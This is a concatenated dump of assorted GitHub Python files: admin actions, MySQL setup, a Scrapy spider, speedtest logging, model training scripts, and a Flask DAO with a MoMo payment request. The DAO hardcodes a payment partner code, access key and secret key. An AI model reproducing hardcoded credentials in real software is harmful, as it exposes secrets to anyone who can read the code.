del_removed_packages():\n\tquery = Package.query.filter_by(state=PackageState.DELETED)\n\tcount = query.count()\n\tfor pkg in query.all():\n\t\tpkg.review_thread = None\n\t\tdb.session.delete(pkg)\n\tdb.session.commit()\n\n\tflash(\"Deleted {} soft deleted packages packages\".format(count), \"success\")\n\treturn redirect(url_for(\"admin.admin_page\"))\n\n\n@action(\"DANGER: Check all releases (postReleaseCheckUpdate)\")\ndef check_releases():\n\treleases = PackageRelease.query.filter(PackageRelease.url.like(\"/uploads/%\")).all()\n\n\ttasks = []\n\tfor release in releases:\n\t\ttasks.append(check_zip_release.s(release.id, release.file_path))\n\n\tresult = group(tasks).apply_async()\n\n\twhile not result.ready():\n\t\timport time\n\t\ttime.sleep(0.1)\n\n\treturn redirect(url_for(\"todo.view_editor\"))\n\n\n@action(\"DANGER: Check latest release of all packages (postReleaseCheckUpdate)\")\ndef reimport_packages():\n\ttasks = []\n\tfor package in Package.query.filter(Package.state != PackageState.DELETED).all():\n\t\trelease = package.releases.first()\n\t\tif release:\n\t\t\ttasks.append(check_zip_release.s(release.id, release.file_path))\n\n\tresult = group(tasks).apply_async()\n\n\twhile not result.ready():\n\t\timport time\n\t\ttime.sleep(0.1)\n\n\treturn redirect(url_for(\"todo.view_editor\"))\n\n\n@action(\"DANGER: Import screenshots from Git\")\ndef import_screenshots():\n\tpackages = Package.query \\\n\t\t.filter(Package.state != PackageState.DELETED) \\\n\t\t.outerjoin(PackageScreenshot, Package.id == PackageScreenshot.package_id) \\\n\t\t.filter(PackageScreenshot.id == None) \\\n\t\t.all()\n\tfor package in packages:\n\t\timport_repo_screenshot.delay(package.id)\n\n\treturn redirect(url_for(\"admin.admin_page\"))\n","repo_name":"minetest/contentdb","sub_path":"app/blueprints/admin/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":10450,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"50"} +{"seq_id":"30211862014","text":"import mysql.connector\nfrom mysql.connector import errorcode\nimport db.database_config as db\nfrom util import get_first\n\nDB_NAME = db.get_db_name()\nTABLES = {}\n\nTABLES['id_queue'] = (\n \"CREATE TABLE `id_queue` (\"\n \" `uid` int(11) NOT NULL AUTO_INCREMENT,\"\n \" `id` varchar(128) NOT NULL,\"\n \" `next_id` varchar(128) NOT NULL,\"\n \" `count` int(11) NOT NULL DEFAULT 0,\"\n \" `area` int(11) NOT NULL DEFAULT 0,\"\n \" `next_area` int(11) NOT NULL DEFAULT 0,\"\n \" PRIMARY KEY (`uid`)\"\n \") ENGINE=InnoDB\")\n\nTABLES['detail'] = (\n \"CREATE TABLE `detail` (\"\n \" `uid` int(11) NOT NULL AUTO_INCREMENT,\"\n \" `id` varchar(128) NOT NULL,\"\n \" `detail` text(30000) NOT NULL,\"\n \" PRIMARY KEY (`uid`)\"\n \") ENGINE=InnoDB\")\n\n\nclass Db:\n def __init__(self):\n '''\n 初始化,连接并创建数据库、表\n '''\n self.cnx = mysql.connector.connect(user='root', host=db.get_host(), password=db.get_password())\n self.cursor = self.cnx.cursor()\n try:\n self.cnx.database = DB_NAME\n except Exception as err:\n if err.errno == errorcode.ER_BAD_DB_ERROR:\n try:\n self.cursor.execute(\n \"CREATE DATABASE {} DEFAULT CHARACTER SET 'utf8'\".format(DB_NAME)\n )\n except mysql.connector.Error as err:\n print('Fail to create database: {}'.format(DB_NAME))\n exit(-1)\n self.cnx.database = DB_NAME\n else:\n print(err)\n exit(-1)\n # 数据表\n for name, ddl in TABLES.items():\n try:\n print(\"Creating table {}: \".format(name), end='')\n self.cursor.execute(ddl)\n except mysql.connector.Error as err:\n if err.errno == 
errorcode.ER_TABLE_EXISTS_ERROR:\n print(\"table {} already exists.\".format(name))\n else:\n print(err.msg)\n else:\n print(\"all tables was be established\")\n\n def insert_first(self):\n # alter table id_queue AUTO_INCREMENT = 1\n self.cursor.execute(\"select count(*) from id_queue\")\n count = self.cursor.fetchone()[0]\n if(count == 0):\n first = get_first()\n add_first = (\"INSERT INTO id_queue\"\n \"(id, next_id, count, area, next_area)\"\n \"VALUES (%s, %s, %s, %s, %s)\")\n self.cursor.execute(add_first, (first.get('id'), first.get('next_id'), first.get('count'), first.get('area'), first.get('next_area')))\n self.cnx.commit()\n else:\n pass\n\n def insert_id(self, id, next_id, count, area, next_area):\n # sql语句\n add_id = (\"INSERT INTO id_queue\"\n \"(id, next_id, count, area, next_area)\"\n \"VALUES (%s, %s, %s, %s, %s)\")\n self.cursor.execute(add_id, (id, next_id, count, area, next_area))\n self.cnx.commit()\n\n def insert_detail(self, id, detail):\n add_detail = (\"INSERT INTO detail\"\n \"(id, detail)\"\n \"VALUES (%s, %s)\")\n self.cursor.execute(add_detail, (id, detail))\n self.cnx.commit()\n\n def fetch_last_one(self):\n query_last_id = ('select * from id_queue order by uid desc limit 1')\n self.cursor.execute(query_last_id)\n return self.cursor.fetchone()\n\n def alter_count(self):\n '''\n 修改最后一条字段的count\n UPDATE id_queue set count=new_count WHERE 1 ORDER BY uid DESC LIMIT 1\n :return:\n '''\n first = get_first()\n query = \"UPDATE id_queue set `count`=(%s) WHERE 1 ORDER BY uid DESC LIMIT 1\"\n self.cursor.execute(query, (first.get('count'),))\n self.cnx.commit()\n\n def get_now_count(self):\n self.cursor.execute(\"select count(*) from id_queue\")\n return self.cursor.fetchone()[0]\n","repo_name":"hanyang-sh/itslaw","sub_path":"db/create_database.py","file_name":"create_database.py","file_ext":"py","file_size_in_byte":3976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"40809563546","text":"import os\nimport subprocess\ndirectory = '/home/hxianglong/Projects/Hbnn-100'\nscreen = 'exp 2'\nenv = 'Hbnn'\nexperiment = 'test.py'\n# subprocess.Popen('cd %s'%directory, shell=True)\n# subprocess.Popen()\n# bash = os.system()\n# bash('bash -c \\'cd %s\\'' % directory)\n# bash('bash -c \\'screen -r %s\\'' % screen)\n# bash('bash -c \\'source activate %s\\'' % env)\nos.system('bash -c \\'cd %s\\'' % directory)\nos.system('bash -c \\'screen -r %s\\'' % screen)\nos.system('bash -c \\'source activate %s\\'' % env)\n# bash('bash -c \\'python %s |& tee %s\\'' % (experiment, experiment))\nsubprocess.Popen('python %s |& tee %s' % (experiment, experiment), shell=True)\n\n# bash('bash -c \\'screen -R %s\\'' % directory)\n","repo_name":"wangboyu-langya/Hierarchical-Bayesian-Neural-Network","sub_path":"sp.py","file_name":"sp.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"50"} +{"seq_id":"72698061594","text":"from RosENet.preprocessing.step import Step\nimport RosENet.rosetta.rosetta as rosetta\n\nclass MakeLigandParamsPDB(metaclass=Step):\n \"\"\"Preprocessing step that create the ligand.params and ligand.pdb files at\n the beginning of the pipeline.\"\"\"\n\n @classmethod\n def files(cls, pdb_object):\n \"\"\"List of files being created\n\n pdb_object : PDBObject\n PDB structure being handled\n \"\"\"\n return [pdb_object.ligand.params,\n pdb_object.ligand.pdb]\n\n @classmethod\n def _run(cls, pdb_object):\n \"\"\"Inner function for the 
preprocessing step.\n\n pdb_object : PDBObject\n PDB structure being handled\n \"\"\"\n ligand_mol2_path = pdb_object.ligand.mol2.path\n params_filename = ligand_mol2_path.stem\n working_directory = ligand_mol2_path.parent\n return rosetta.molfile_to_params(\n working_directory = working_directory,\n output_path = params_filename,\n input_path = ligand_mol2_path)\n\n","repo_name":"DS3Lab/RosENet","sub_path":"RosENet/preprocessing/make_ligand_params_pdb.py","file_name":"make_ligand_params_pdb.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"50"} +{"seq_id":"8624289207","text":"from datetime import date\n\nfrom sqlalchemy import Column, String, Integer, Date, Numeric\nfrom base import session_factory, Base\n\n\nclass Person(Base):\n __tablename__ = 'person'\n\n id = Column(Integer, primary_key=True)\n name = Column(String)\n date_of_birth = Column(Date)\n height = Column(Integer)\n weight = Column(Numeric)\n\n def __init__(self, name, date_of_birth, height, weight):\n self.name = name\n self.date_of_birth = date_of_birth\n self.height = height\n self.weight = weight\n\ndef create_people():\n session = session_factory()\n bruno = Person(\"Bruno Krebs\", date(1984, 10, 20), 182, 84.5)\n john = Person(\"John Doe\", date(1990, 5, 17), 173, 90)\n session.add(bruno)\n session.add(john)\n session.commit()\n session.close()\n\n\ndef get_people():\n session = session_factory()\n people_query = session.query(Person)\n session.close()\n return people_query.all()\n\n\nif __name__ == \"__main__\":\n people = get_people()\n if len(people) == 0:\n create_people()\n people = get_people()\n\n for person in people:\n print('{} was born in {}'.format(person.name, person.date_of_birth))\n","repo_name":"sistemocl/grafana_middleware","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"28492174637","text":"from sklearn.model_selection import train_test_split\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.datasets import load_iris\nimport matplotlib.pyplot as plt\n\niris = load_iris()\n\ntrain_X,test_X,train_y,test_y = train_test_split(iris.data,iris.target,stratify=iris.target,random_state=42)\n\nX = []\nY = []\n\nfor k in range(1,101,2):\n model = KNeighborsClassifier(n_neighbors=k)\n model.fit(train_X,train_y)\n model.predict(test_X)\n Y.append(model.score(test_X,test_y))\n X.append(k)\n\nplt.ylim(0, 1)\nplt.grid(True)\nplt.plot(X,Y)\n#plt.show()\nplt.savefig('Fig1.png')\n","repo_name":"ei1704/NT-WorkSpace","sub_path":"20/20_4.py","file_name":"20_4.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"37632614409","text":"import scrapy\n\nclass QuotesSpider(scrapy.Spider):\n\tname = \"quotes\"\n\n\tdef start_requests(self):\n\t\turls = [\n\t\t\t'https://quotes.toscrape.com/page/1/'\n\t\t]\n\n\t\t# Generator function\n\t\tfor u in urls:\n\t\t\tyield scrapy.Request(url=u, callback = self.parse)\n\n\n\tdef parse(self, response):\n\t\t# page_no = response.url.split('/')[-2]\n\t\t# filename = \"quotes-{}.html\".format(page_no)\n\n\t\t# with open(filename, 'wb') as f:\n\t\t# \tf.write(response.body)\n\n\t\t# self.log(\"saved file \"+ filename)\n\n\t\tall_quotes = response.css('div.quote')\n\n\t\tfor quote in all_quotes:\n\t\t\ttitle = 
quote.css('span.text::text').get()\n\t\t\tauthor = quote.css('small.author::text').get()\n\t\t\ttags = quote.css('a.tag::text').getall()\n\n\t\t\tresult = {\n\t\t\t\t'text' : title,\n\t\t\t\t'author': author,\n\t\t\t\t'tags' : tags\n\t\t\t}\n\n\t\t\tyield result\n\n\t\t# pagination: follow the next page once per response, outside the quote loop\n\t\tnext_page = response.css('li.next a::attr(href)').get()\n\n\t\tif next_page is not None:\n\t\t\tnext_page = response.urljoin(next_page)\n\t\t\tyield scrapy.Request(url=next_page, callback = self.parse)\n\n\n","repo_name":"coding-minutes/python-data-science-mastercourse","sub_path":"10 Web crawling - scrapy/quotescrawler/quotescrawler/spiders/quotes_spider.py","file_name":"quotes_spider.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"52"}
+{"seq_id":"2396186014","text":"#!/usr/bin/env python3\n\nimport datetime\nimport json\nimport os\nimport subprocess\nimport time\nimport sys\nfrom influxdb import InfluxDBClient\nimport influxdb.exceptions\n\n# Variables\ninfluxdb_host = os.getenv(\"INFLUXDB_HOST\", \"localhost\")\ninfluxdb_port = int(os.getenv(\"INFLUXDB_PORT\", 8086))\ninfluxdb_user = os.getenv(\"INFLUXDB_USER\")\ninfluxdb_pass = os.getenv(\"INFLUXDB_PASS\")\ninfluxdb_db = os.getenv(\"INFLUXDB_DB\")\nsleepy_time = int(os.getenv(\"SLEEPY_TIME\", 3600))\nstart_time = datetime.datetime.utcnow().isoformat()\n\n# Some logging\nprint(\"#####\\nScript starting!\\n#####\")\nprint(\"STATE: Starting at\", start_time)\nprint(\"STATE: Sleep time between runs set to\", sleepy_time, \"seconds\")\n\n\ndef loop():\n    current_time = datetime.datetime.utcnow().isoformat()\n    print(\"STATE: Loop running at\", current_time)\n\n    # Run Speedtest\n    print(\"STATE: Speedtest running\")\n    my_speed = subprocess.run(['/usr/bin/speedtest', '--accept-license', '--accept-gdpr', '--format=json'], stdout=subprocess.PIPE, text=True, check=True)\n\n    # Parse the stdout as JSON, trimming surrounding whitespace first\n    my_json = json.loads(my_speed.stdout.strip())\n\n    # Get the values from JSON and log them to the Docker logs\n    speed_down = my_json[\"download\"][\"bandwidth\"]\n    speed_up = my_json[\"upload\"][\"bandwidth\"]\n    ping_latency = my_json[\"ping\"][\"latency\"]\n    ping_jitter = my_json[\"ping\"][\"jitter\"]\n    timestamp = my_json[\"timestamp\"]\n    result_url = my_json[\"result\"][\"url\"]\n\n    print(\"STATE: Your download is\", speed_down, \"bps\")\n    print(\"STATE: Your upload is\", speed_up, \"bps\")\n    print(\"STATE: Your ping latency is\", ping_latency, \"ms\")\n    print(\"STATE: Your ping jitter is\", ping_jitter, \"ms\")\n    print(\"STATE: Your URL is\", result_url, \" --- This is not saved to InfluxDB\")\n\n    # Create a JSON body to send to InfluxDB\n    json_body = [\n        {\n            \"measurement\": \"speedtest\",\n            \"tags\": {\n                \"service\": \"speedtest\"\n            },\n            \"time\": timestamp,\n            \"fields\": {\n                \"download\": speed_down,\n                \"upload\": speed_up,\n                \"ping_latency\": ping_latency,\n                \"ping_jitter\": ping_jitter\n            }\n        }\n    ]\n\n    # Instantiate the connection\n    print(\"STATE: Connecting to InfluxDB...\")\n    client = InfluxDBClient(host=influxdb_host, port=influxdb_port, username=influxdb_user, password=influxdb_pass, database=influxdb_db, timeout=15)\n\n    # Try to connect\n    try:\n        result = client.ping()\n        print(\"STATE: Connected to InfluxDB successfully - version is\", result)\n        print(\"STATE: Writing to database\")\n        client.write_points(json_body)\n    except influxdb.exceptions.InfluxDBClientError as err:\n        print(\"ERROR: Error 
with client\")\n print(err)\n sys.exit(1)\n except influxdb.exceptions.InfluxDBServerError as err:\n print(\"ERROR: Error with server\")\n print(err)\n sys.exit(1)\n except Exception as err:\n print(err)\n\n print(\"STATE: Sleeping for\", sleepy_time, \"seconds\")\n time.sleep(sleepy_time)\n\n\nwhile True:\n loop()\n","repo_name":"loganmarchione/docker-speedtest-influxdb","sub_path":"speedtest.py","file_name":"speedtest.py","file_ext":"py","file_size_in_byte":3144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"26981997877","text":"#!/usr/bin/python3\n\n##########################\ndef allow_import():\n import os\n import sys\n import inspect\n\n currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\n parentdir = os.path.dirname(currentdir)\n sys.path.insert(0, parentdir)\n\nallow_import()\n##########################\n\nimport os\n#os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0, 1, 2, 3\"\n#os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0, 1, 2, 3\"\n\nimport argparse\nimport warnings\nimport pytorch_lightning as pl\nfrom pytorch_lightning.callbacks import ModelCheckpoint\nfrom pytorch_lightning.loggers import WandbLogger\nfrom pytorch_lightning.strategies.ddp import DDPStrategy\n\n# DieHardNET packages\nfrom pytorch_scripts.utils import *\nfrom pytorch_scripts.LightningModelWrapper import UpdateNormStatsCallback\nfrom pytorch_scripts.data_module import DataModule\n\n# Suppress the annoying warning for non-empty checkpoint directory\nwarnings.filterwarnings(\"ignore\")\n\nconfig_parser = parser = argparse.ArgumentParser(description='Configuration', add_help=False)\nparser.add_argument('-c', '--config', default='', type=str, metavar='FILE',\n help='YAML config file specifying default arguments.')\n\nparser = argparse.ArgumentParser(description='PyTorch Training')\n\n\n# General\nparser.add_argument('--name', type=str, default='test', help='Experiment name.')\nparser.add_argument('--mode', type=str, default='train', help='Mode: train/training or validation/validate.')\nparser.add_argument('--ckpt', type=str, default=None, help='Pass the name of a checkpoint to resume training.')\nparser.add_argument('--dataset', type=str, default='cifar10', help='Dataset name: cifar10 or cifar100.')\nparser.add_argument('--size', type=int, default=224, help='Image size.')\nparser.add_argument('--precision', type=int, default=16, help='Whether to use Mixed Precision or not.')\nparser.add_argument('--data_dir', type=str, default=None, help='Path to dataset.')\nparser.add_argument('--num_gpus', type=int, default=1, help='Number of GPUs.')\n\n# Model\nparser.add_argument('--model', type=str, default='resnet20', help='Network name. 
Resnets only for now.')\nparser.add_argument('--model_clip', type=bool, default=False, help='Whether to clip layer outputs or not.')\nparser.add_argument('--nan', type=bool, default=False, help='Whether to convert NaNs to 0 or not.')\nparser.add_argument('--freeze', type=bool, default=False, help='Whether to freeze all layer but BN in the first epoch or not.')\nparser.add_argument('--pretrained', type=bool, default=False, help='Whether to start from pretrained weights or not.')\nparser.add_argument('--activation', type=str, default='max', help='Which variant of RobustActivation to use (select deeplab_relumax to use)', choices=['max', 'mean_std', 'median_iqr'])\n\n# Optimization\nparser.add_argument('--loss', type=str, default='bce', help='Loss: bce, ce or sce.')\nparser.add_argument('--grad_clip', default=None, help='Gradient clipping value.')\nparser.add_argument('--epochs', type=int, default=150, help='Number of epochs.')\nparser.add_argument('--batch_size', type=int, default=128, help='Batch Size')\nparser.add_argument('--lr', type=float, default=1e-1, help='Learning rate.')\nparser.add_argument('--scheduler', type=str, default='cosine', help='Scheduler name: cosine, poly')\nparser.add_argument('--lr_min', type=float, default=1e-1, help='Minimum learning rate.')\nparser.add_argument('--optimizer', type=str, default='sgd', help='Optimizer name: adamw or sgd.')\n\n# Injection\nparser.add_argument('--error_model', type=str, default='random', help='Optimizer name: adamw or sgd.')\nparser.add_argument('--inject_p', type=float, default=0.1, help='Probability of noise injection at training time.')\nparser.add_argument('--inject_epoch', type=float, default=0, help='How many epochs before starting the injection.')\n\n# Augmentations and Regularisations\nparser.add_argument('--wd', type=float, default=1e-4, help='Weight Decay.')\nparser.add_argument('--rcc', type=float, default=0.75, help='RCC lower bound.')\nparser.add_argument('--rand_aug', type=str, default=None, help='RandAugment magnitude and std.')\nparser.add_argument('--rand_erasing', type=float, default=0.0, help='Random Erasing propability.')\nparser.add_argument('--mixup_cutmix', type=bool, default=False, help='Whether to use mixup/cutmix or not.')\nparser.add_argument('--jitter', type=float, default=0.0, help='Color jitter.')\nparser.add_argument('--label_smooth', type=float, default=0.0, help='Label Smoothing.')\n\n\n# Others\nparser.add_argument('--seed', default=0, help='Random seed for reproducibility.')\nparser.add_argument('--comment', default='', help='Optional comment.')\n\nn_classes = {'cifar10': 10, 'cifar100': 100, 'ImageNet': 1000, 'cityscapes': 19}\n\ndef main():\n args = parse_args(parser, config_parser)\n\n # Set random seed\n pl.seed_everything(args.seed, workers=True)\n\n augs = {'rand_aug': args.rand_aug, 'rand_erasing': args.rand_erasing, 'mixup_cutmix': args.mixup_cutmix,\n 'jitter': args.jitter, 'label_smooth': args.label_smooth, 'rcc': args.rcc}\n\n root = args.data_dir or get_default_data_root()\n datamodule = DataModule(args.dataset, root, args.batch_size, args.num_gpus,\n size=args.size, augs=augs, fp16=args.precision)\n\n # Build model (ResNet or EfficientNet only up to now)\n optim_params = {'optimizer': args.optimizer, 'epochs': args.epochs, 'lr': args.lr, 'lr_min': args.lr_min,\n 'wd': args.wd, 'scheduler': args.scheduler}\n net = build_model(args.model, n_classes[args.dataset], optim_params, args.loss, args.error_model, args.inject_p,\n args.inject_epoch, args.model_clip, args.nan, args.freeze, 
args.pretrained, args.activation)\n\n    # W&B logger\n    wandb_logger = WandbLogger(project=\"NeutronRobustness\", name=args.name, entity=\"pathselector\")\n    wandb_logger.log_hyperparams(args)\n    wandb_logger.watch(net, log_graph=False)\n\n    # Callbacks\n    filename_quantity = '-{epoch:02d}-{val_acc:.2f}'\n    #monitored_quantity, monitored_mode = 'val_acc', 'max'\n\n    if args.dataset == 'cityscapes':\n        filename_quantity = '-{epoch:02d}-{val_miou:.4f}'\n        #monitored_quantity, monitored_mode = 'noisy_val_miou', 'max'\n\n    ckpt_callback = ModelCheckpoint('checkpoints/', \n                                    filename=args.name + filename_quantity,\n                                    save_last=False)\n    #stats_callback = UpdateNormStatsCallback()\n    callbacks = [ckpt_callback]\n\n    # Pytorch-Lightning Trainer\n    trainer = pl.Trainer(max_epochs=args.epochs, devices=args.num_gpus, callbacks=callbacks, logger=wandb_logger, log_every_n_steps=1,\n                         deterministic='warn', benchmark=True, accelerator='gpu', sync_batchnorm=True,\n                         gradient_clip_val=args.grad_clip, strategy=DDPStrategy(find_unused_parameters=False),\n                         precision=args.precision, auto_select_gpus=False)\n\n    #if args.ckpt:\n    #    #args.ckpt = '~/Dropbox/DieHardNet/Checkpoints/' + args.ckpt\n    #    args.ckpt = 'checkpoints/' + args.ckpt\n    if args.mode == 'train' or args.mode == 'training':\n        trainer.fit(net, datamodule, ckpt_path=args.ckpt)\n        trainer.test(net, datamodule, ckpt_path=args.ckpt)\n    elif args.mode == 'validation' or args.mode == 'validate':\n        trainer.validate(net, datamodule, ckpt_path=args.ckpt)\n    elif args.mode == 'test' or args.mode == 'testing':\n        trainer.test(net, datamodule, ckpt_path=args.ckpt)\n    else:\n        print('ERROR: select a suitable mode \"train/training\" or \"validation/validate\".')\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"iurada/robust-segmentation","sub_path":"training/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"10417792908","text":"from tokenize import String\n\nfrom app import app, db\nimport os\n# import urllib.request explicitly: plain \"import urllib\" does not make the\n# urllib.request submodule (used in payment_momo below) reliably available\nimport hashlib, uuid, hmac, json, urllib.request\nfrom app.models import ChuyenBay, KhachHang\n\n\ndef read_chuyenbay(San_Bay_Di_id=0,San_Bay_Den_id=0,San_Bay_Di=None,San_Bay_Den=None):\n    chuyenbay= ChuyenBay.query.filter().all()\n    cacchuyenbay = []\n    if San_Bay_Di_id > 0:\n        chuyenbay = [p for p in chuyenbay if p[\"San_Bay_Di_id\"] == San_Bay_Di_id]\n    if San_Bay_Den_id > 0:\n        chuyenbay = [p for p in chuyenbay if p[\"San_Bay_Den_id\"] == San_Bay_Den_id]\n    if San_Bay_Di and San_Bay_Den:\n        chuyenbay = ChuyenBay.query.filter().all()\n        for i in range(0, len(chuyenbay)):\n            if(San_Bay_Di == chuyenbay[i].San_Bay_Di.Ten_San_Bay and San_Bay_Den == chuyenbay[i].San_Bay_Den.Ten_San_Bay ):\n                cacchuyenbay.append(chuyenbay[i])\n\n    # guard against an empty result to avoid an IndexError when no flight matches\n    return cacchuyenbay[0] if cacchuyenbay else None\n\n\n\n\ndef add_Khachhang(Quy_Danh = None, Ten_Khach_Hang = None, Dia_Chi = None, CMND =0, Email = None, SDT = 0, Ghi_Chu=None):\n    p = KhachHang(\n        Quy_Danh = Quy_Danh, Ten_Khach_Hang = Ten_Khach_Hang, Dia_Chi=Dia_Chi, CMND = CMND, Email = Email, SDT= SDT, Ghi_Chu = Ghi_Chu\n    )\n    db.session.add(p)\n    db.session.commit()\n\n\n\ndef read_ChuyenBay_show(San_Bay_Di_id=0, San_Bay_Den_id=0, San_Bay_Di=None, San_Bay_Den=None, latest=False):\n    q=ChuyenBay.query\n\n    if San_Bay_Di:\n        q= q.filter(ChuyenBay.name.contains(San_Bay_Di))\n    if San_Bay_Den:\n        q=q.filter(ChuyenBay.name.contains(San_Bay_Den))\n    if latest:\n        return q.all()[:5]\n    return q.all()\n\n\ndef payment_momo():\n    endpoint = 
\"https://test-payment.momo.vn/gw_payment/transactionProcessor\"\n partnerCode = \"MOMOY1ZA20200907\"\n accessKey = \"rVuWIV2U6YHmb803\"\n serectkey = \"EQeEkD4sirbclirmqPv5qXDrcLu2h5EZ\"\n orderInfo = \"pay with MoMo\"\n returnUrl = \"https://momo.vn/return\"\n notifyurl = \"https://dummy.url/notify\"\n amount = \"2000000\"\n orderId = str(uuid.uuid4())\n requestId = str(uuid.uuid4())\n requestType = \"captureMoMoWallet\"\n extraData = \"merchantName=;merchantId=\"\n rawSignature = \"partnerCode=\" + partnerCode + \"&accessKey=\" + accessKey + \"&requestId=\" + requestId + \"&amount=\" + amount + \"&orderId=\" + orderId + \"&orderInfo=\" + orderInfo + \"&returnUrl=\" + returnUrl + \"¬ifyUrl=\" + notifyurl + \"&extraData=\" + extraData\n\n h = hmac.new(serectkey.encode('utf-8'), rawSignature.encode('utf-8'), hashlib.sha256)\n signature = h.hexdigest()\n\n data = {\n 'partnerCode': partnerCode,\n 'accessKey': accessKey,\n 'requestId': requestId,\n 'amount': amount,\n 'orderId': orderId,\n 'orderInfo': orderInfo,\n 'returnUrl': returnUrl,\n 'notifyUrl': notifyurl,\n 'extraData': extraData,\n 'requestType': requestType,\n 'signature': signature\n }\n data = json.dumps(data)\n clen = len(data)\n req = urllib.request.Request(\n endpoint,\n data.encode('utf-8'),\n {'Content-Type': 'application/json', 'Content-Length': clen}\n )\n f = urllib.request.urlopen(req)\n response = f.read()\n f.close()\n return json.loads(response)\n\n\nif __name__ == \"__main__\":\n print(read_chuyenbay())","repo_name":"nhlonglegend/QuanLyBanVeMayBay","sub_path":"app/dao.py","file_name":"dao.py","file_ext":"py","file_size_in_byte":3169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"70262347995","text":"from tqdm import tqdm\nimport re\nfrom textblob import Word\nimport numpy as np\n\n# Split at capitalize words and add underscore\ndef convert(name):\n s1 = re.sub('(.)([A-Z][a-z]+)', r'\\1_\\2', name)\n return re.sub('([a-z0-9])([A-Z])', r'\\1_\\2', s1).lower()\n\ndef clean_trope(column):\n # Replace Longrunner with LongRunner\n column = column.str.replace('Longrunner', 'LongRunner', regex=False)\n # dataframe.loc[dataframe.Trope=='Longrunner', 'Trope'] = 'LongRunner'\n # Split at capitalize words and add underscore \n column = column.apply(lambda w: convert(w))\n # Convert plural to singular to get rid of duplicates\n column = column.apply(lambda w: Word(w).singularize())\n # dataframe = dataframe.reset_index(drop=True)\n return column\n\n# Decontract text\ndef decontracted(phrase):\n # specific\n phrase = re.sub(r\"won't\", \"will not\", str(phrase))\n phrase = re.sub(r\"can\\'t\", \"can not\", str(phrase))\n\n # general\n phrase = re.sub(r\"n\\'t\", \" not\", str(phrase))\n phrase = re.sub(r\"\\'re\", \" are\", str(phrase))\n phrase = re.sub(r\"\\'s\", \" is\", str(phrase))\n phrase = re.sub(r\"\\'d\", \" would\", str(phrase))\n phrase = re.sub(r\"\\'ll\", \" will\", str(phrase))\n phrase = re.sub(r\"\\'t\", \" not\", str(phrase))\n phrase = re.sub(r\"\\'ve\", \" have\", str(phrase))\n phrase = re.sub(r\"\\'m\", \" am\", str(phrase))\n return phrase\n\n# Preprocess text\ndef preprocess(text_column):\n my_list = []\n # tqdm is for printing the status bar\n for sentance in tqdm(text_column.values):\n sent = decontracted(sentance)\n sent = sent.replace('\\\\r', ' ')\n sent = sent.replace('\\\\\"', ' ')\n sent = sent.replace('\\\\n', ' ')\n sent = re.sub('[^A-Za-z0-9]+', ' ', sent)\n # https://gist.github.com/sebleier/554280\n sent = ' '.join(e.lower() for e 
in sent.split())\n my_list.append(sent.lower().strip())\n \n return my_list","repo_name":"chav-ngvyen/NLP_tvtropes","sub_path":"codes/preprocess_functions.py","file_name":"preprocess_functions.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"40615862032","text":"import re\nimport sys\n\nVARS = []\n\nkeywords = [\"if\", \"endif\", \"for\", \"endfor\", \"and\", \"or\", \"max\", \"min\", \"else\", \"MAX\", \"MIN\"]\n\n# przetwarza petle\ndef Loop(loop, extra_ub = 0):\n\n step = 0\n pattern = re.compile(\"\\W*for\\W*\\(\")\n if pattern.match(loop):\n line = pattern.sub(\"\", loop)\n test = re.compile(\";\").split(line)\n z1 = re.compile(\"=.*\")\n var = z1.sub(\"\",test[0])\n var = var.replace(\" \", \"\")\n z1 = re.compile(\".*=\")\n lb = z1.sub(\"\",test[0])\n\n ub = \"\"\n z1 = re.compile(\".*<=\")\n if(z1.match(test[1])):\n ub = z1.sub(\"\",test[1])\n else:\n z1 = re.compile(\".*<\")\n if(z1.match(test[1])):\n ub = z1.sub(\"\",test[1]) + \"-1\"\n\n if ub == \"\":\n z1 = re.compile(\".*>=\")\n if(z1.match(test[1])):\n ub = z1.sub(\"\",test[1])\n else:\n z1 = re.compile(\".*>\")\n if(z1.match(test[1])):\n ub = z1.sub(\"\",test[1]) + \"+1\"\n\n if(extra_ub != 0):\n ub = ub + \" + \" + str(extra_ub)\n\n if (extra_ub != 0):\n lb = lb + \" - \" + str(extra_ub)\n\n\n # przerobic na inne zmiany zmiennej indeksowej += -=\n\n z1 = re.compile(\".*\\+\\+\")\n \n if z1.match(test[2]):\n step = 1\n\n z1 = re.compile(\".*\\-\\-\")\n if z1.match(test[2]):\n step = -1\n \n _z = test[2]\n _z = _z.replace(\")\", \"\") \n \n if \"+=\" in _z:\n _z = _z.replace(\"+=\", \"\")\n _z = _z.replace(var, \"\")\n step = _z\n \n if \"-=\" in _z:\n _z = _z.replace(\"-=\", \"\")\n _z = _z.replace(var, \"\")\n step = \"-\" +_z\n\n\n\n new_loop = \"for \" + var + \" = \" + lb + \" to \" + ub;\n\n\n #new_loop += \"endfor\"\n if step != 1:\n new_loop = new_loop + ' by ' + str(step).replace(\"{\", \"\")\n\n\n\n \n new_loop 